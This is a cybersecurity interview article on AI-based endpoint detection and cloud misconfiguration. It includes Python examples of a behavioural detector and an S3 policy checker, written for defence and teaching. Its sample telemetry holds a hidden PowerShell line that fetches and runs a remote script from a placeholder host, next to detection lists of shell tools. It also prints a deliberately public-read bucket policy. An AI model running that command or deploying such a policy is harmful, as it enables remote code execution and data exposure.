Proactively detecting threats through AI

John-Thomas Gaietto, Richey May & Co

Artificial intelligence is enabling organisations to be more proactive in their approach to cyber threats. Work environments with higher levels of remote access might be considered more exposed, but automating the identification and remediation of potentially malicious behaviour goes a long way towards offsetting that exposure.

A key development in cybersecurity has been endpoint detection and response (EDR).

John-Thomas Gaietto, executive director of Cybersecurity Services at Richey May & Co, discusses this progress and the benefits it brings firms: “The general basis of the tool is that, unlike traditional malware software that requires definition files to function and detect threats, this solution utilises machine learning and behavioural analysis to detect malicious behaviour.

“This technology enables organisations to detect threats earlier. Further, these tools have a lot of security automation built in. So not only can you detect the threats sooner, but you can also respond and remediate near automatically. That really moves the needle for a lot of organisations.”

Discussing the improvements artificial intelligence has brought to cybersecurity, Gaietto points to pattern recognition at a scale no analyst can match: “There are things that humans wouldn’t pick up on because of the volume of information they would need to analyse. AI allows organisations to identify anomalies and behaviours that would have been much more difficult to isolate without that automation.”

AI and other automation can also help organisations that do not have the budget for an around-the-clock security operations centre. “Instead of alerting a cybersecurity person and having to wait for them to check their phone, the tool can automatically take an action to stop the spread of any malicious behaviour. The system dictates the action taken when it detects certain types of behaviour,” Gaietto explains.
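As an added illustration (not the vendor product Gaietto describes, and not code from Richey May & Co), the Python sketch below shows the two ideas in the paragraphs above: detection rules keyed on behaviour rather than on signature files, and a playbook that maps each detection to an automatic response so no analyst has to be paged first. The event schema, rule names, playbook actions and telemetry are all constructed for the example; a real agent would execute the actions rather than return them.

```python
from collections import defaultdict
from dataclasses import dataclass

# Hypothetical playbook: each behavioural rule maps to the response the agent
# takes on its own, without waiting for a human.
PLAYBOOK = {
    "office_app_spawns_shell": "terminate_process",
    "rapid_file_renames": "isolate_host",
}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    pid: int
    detail: str

    @property
    def action(self) -> str:
        return PLAYBOOK[self.rule]


def _basename(path: str) -> str:
    """Image name only, lower-cased; accepts Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_office_spawns_shell(events):
    """An Office application launching a shell or script host: classic macro
    dropper behaviour, caught without knowing the hash of the document or payload."""
    for e in events:
        if e["type"] != "process":
            continue
        parent, child = _basename(e["parent_image"]), _basename(e["image"])
        if parent in OFFICE_APPS and child in SHELLS:
            yield Alert("office_app_spawns_shell", e["host"], e["pid"],
                        f"{parent} -> {e['cmdline']}")


def rule_rapid_file_renames(events, threshold=20, window_s=10.0):
    """One process renaming >= threshold distinct files inside a sliding window of
    window_s seconds: ransomware-like, whichever binary is doing it."""
    per_proc = defaultdict(list)
    for e in events:
        if e["type"] == "file_rename":
            per_proc[(e["host"], e["pid"])].append((e["ts"], e["path"]))
    for (host, pid), renames in per_proc.items():
        renames.sort()
        start = 0
        for end, (ts, _path) in enumerate(renames):
            while ts - renames[start][0] > window_s:   # slide the window forward
                start += 1
            distinct = {p for _, p in renames[start:end + 1]}
            if len(distinct) >= threshold:
                yield Alert("rapid_file_renames", host, pid,
                            f"{len(distinct)} files renamed within {window_s}s")
                break


def detect(events):
    """Run every rule over the event stream and return the alerts raised."""
    return list(rule_office_spawns_shell(events)) + list(rule_rapid_file_renames(events))


def respond(alerts):
    """(host, pid, action) triples the playbook dictates for each alert."""
    return [(a.host, a.pid, a.action) for a in alerts]


# Constructed telemetry (not real logs). Host ws-17 shows a user-opened prompt
# (benign), then Word launching a hidden PowerShell that renames 25 documents.
# Host ws-22 is a build server renaming a handful of files slowly (benign).
SAMPLE_EVENTS = [
    {"type": "process", "ts": 5.0, "host": "ws-17", "pid": 4412,
     "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe"},
    {"type": "process", "ts": 61.0, "host": "ws-17", "pid": 5004,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": 'powershell.exe -w hidden -nop -c "iex (iwr http://example.invalid/a.ps1)"'},
] + [
    {"type": "file_rename", "ts": 70.0 + 0.2 * i, "host": "ws-17", "pid": 5004,
     "path": rf"C:\Users\alice\Documents\report{i}.docx.locked"}
    for i in range(25)
] + [
    {"type": "file_rename", "ts": 100.0 + 3.0 * i, "host": "ws-22", "pid": 810,
     "path": rf"C:\build\out{i}.tmp"}
    for i in range(5)
]

if __name__ == "__main__":
    for host, pid, action in respond(detect(SAMPLE_EVENTS)):
        print(f"{host} pid {pid}: {action}")
```

Running the script against the constructed events raises two alerts, both for PowerShell process 5004 on ws-17, and the playbook answers with `terminate_process` and `isolate_host`; the user-opened command prompt and the build server's slow renames raise nothing. Thresholds like 20 files in 10 seconds are illustrative and would be tuned per environment.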

The industry talks about preventing zero-day attacks, and in a world where large swathes of the workforce operate from remote locations this takes on greater significance. According to Gaietto, in addition to EDR tools, one of the crucial elements in protecting an organisation is its frontline defence, the employees themselves, especially when confronted with phishing attacks.

“The first protocol should always be education. Communicate with your employees, as they are your first line of defence. When writing your policies, don’t threaten to penalise people for stepping forward or reporting. You want to encourage them to do that. The companies that invested in training have seen the volume of frontline reporting increase dramatically. So that investment does pay off,” Gaietto advises.

Secure configuration

One of the things financial firms need to be wary of is carrying a traditional cybersecurity approach into the cloud. “You really have to understand the methodology on how to configure the cloud in a secure manner,” Gaietto says.

This matters because the major cloud providers operate what is called a shared responsibility model: the provider secures the physical facilities and the underlying infrastructure, while the customer is responsible for configuring everything it builds on top, including identities, access controls and data protection, to secure its own workloads and data.

Getting this right is crucial, as it can make or break the deployment. According to Gaietto, in most of the headline stories about cloud breaches the root cause is a customer error in configuring the service adopted from the provider. “It is very rare that it’s a software vulnerability issue. Typically, it’s due to user error,” he says.
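To make the misconfiguration point concrete, here is an added example (not from the article and not Richey May & Co code): a constructed S3 bucket policy that grants anonymous read, the corrected version beside it, and a small Python check that flags Allow statements open to any principal. The bucket name, role name, VPC endpoint ID and account ID are placeholders, and the check is a deliberately conservative approximation of real policy evaluation.

```python
import json

# Constructed bucket policies; the account ID is the placeholder AWS uses in its docs.
BUCKET = "arn:aws:s3:::example-reports"

# Weak: the classic "user error" from the headline breaches, anyone can list and read.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",                        # anyone on the internet
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": [BUCKET, BUCKET + "/*"],
    }],
})

# Corrected: same data, read access limited to one IAM role, plaintext HTTP denied.
FIXED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AppRoleRead",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::123456789012:role/reports-reader"},
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": [BUCKET, BUCKET + "/*"],
        },
        {
            "Sid": "DenyInsecureTransport",
            "Effect": "Deny",
            "Principal": "*",                    # a wildcard in a Deny tightens, not loosens
            "Action": "s3:*",
            "Resource": [BUCKET, BUCKET + "/*"],
            "Condition": {"Bool": {"aws:SecureTransport": "false"}},
        },
    ],
})

# Grey area: wildcard principal, but scoped to one VPC endpoint by a Condition.
VPC_ONLY_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "VpcEndpointRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": BUCKET + "/*",
        "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}},
    }],
})


def _as_list(value):
    """Policy grammar allows a bare string where a list is also legal."""
    return value if isinstance(value, list) else [value]


def _principal_is_anonymous(principal) -> bool:
    """True for Principal "*" or {"AWS": "*"}, the forms that mean 'anyone'."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def classify_public_access(policy_json: str):
    """Return (public, needs_review): Sids of Allow statements open to any principal.
    Unconditional ones are public outright. Ones carrying a Condition may or may not
    be restricted in practice (aws:SourceVpce restricts; a Condition that matches
    every request does not), so they are returned separately for a human to check."""
    doc = json.loads(policy_json)
    public, needs_review = [], []
    for st in _as_list(doc.get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        if not _principal_is_anonymous(st.get("Principal")):
            continue
        target = needs_review if st.get("Condition") else public
        target.append(st.get("Sid", "<no Sid>"))
    return public, needs_review


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("fixed", FIXED_POLICY), ("vpc-only", VPC_ONLY_POLICY)):
        print(name, classify_public_access(policy))
```

A check like this belongs in the pipeline that applies the policy, not in a quarterly audit, and it complements rather than replaces the provider's own controls (S3 Block Public Access at the account level stops the weak policy from taking effect at all). The point of the third policy is the caveat: a wildcard principal with a Condition is not automatically safe, and deciding whether the condition genuinely restricts access is exactly the kind of judgement that gets skipped when a traditional on-premises mindset is carried into the cloud.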

Partnerships and impact analyses

Gaietto goes on to outline the benefits of appointing a third-party partner to manage cybersecurity: “It’s simple economics; it’s about the demand and the cost. We’ve seen salaries of cybersecurity staff really skyrocket over the last two or three years, so often it doesn’t make sense for an organisation to have an in-house cybersecurity team which is not a hundred percent utilised a hundred percent of the time. A third-party provider, on the other hand, can provide the service to multiple clients at the cost of half or three quarters of one expert’s salary.”

Firms also need to understand which areas of their business to focus on when putting together their cybersecurity strategy. To determine which processes or areas of the business are critical from a cybersecurity perspective, a firm should undertake a business impact analysis: talking to stakeholders across the business to understand the processes and systems that are essential to their particular area of work.

“An exercise like this identifies business processes and how critical they are to the operation of the organisation. For example, in HR and payroll – if certain processes or systems are compromised, then employees run the risk of not getting paid. Therefore, in this case these are vital for the smooth running of an organisation. Following that, the organisation can map out its technology needs and understand which are the critical or vulnerable parts of its network. These will be the areas they should prioritise when putting together a resiliency programme or disaster recovery programme,” Gaietto recommends.

Strategic planning

This element of strategic planning is one Gaietto believes the industry should focus on: “The compliance side of business resilience is going to be vital going forward. Not many organisations had a defined plan going into the pandemic, and while they made it work, it was all a bit knee-jerk and done on impulse. We are really pushing hard on companies to have clear strategies in place to better protect customer information and things of that nature.”

Mapping out a clear path ahead is even more important in the current environment, given the uncertainty as a result of the Covid-19 pandemic.

“Most organisations are going to come under strain due to a lack of economic activity. Therefore, as budgets get leaner and there is less room for error, making efficient use of that budget is going to become even more important,” Gaietto notes.

He concludes by saying many firms still have a lot to accomplish when it comes to the adoption of automation, AI and machine learning: “This is going to play a huge role. It’s a trend that will continue, because it can be implemented without having a dramatic impact on a firm’s operating cost, which has considerable appeal at this particular point in time.” 

Author Profile

John-Thomas Gaietto
Executive Director of Cybersecurity Services, Richey May & Co

John-Thomas Gaietto, CISSP, has more than 22 years of experience providing enterprise information security and risk management services to a variety of organisations. His expertise includes the development of security strategies based on organisational risk, oversight of security operations, incident response, third-party risk management, disaster recovery, and building high-performing Information Security teams. His experience includes numerous compliance verticals, such as PCI-DSS, Sarbanes-Oxley, HIPAA, GLBA, FISMA, TPN, ISO, SOC, New York State Department of Financial Services Data Security and GDPR.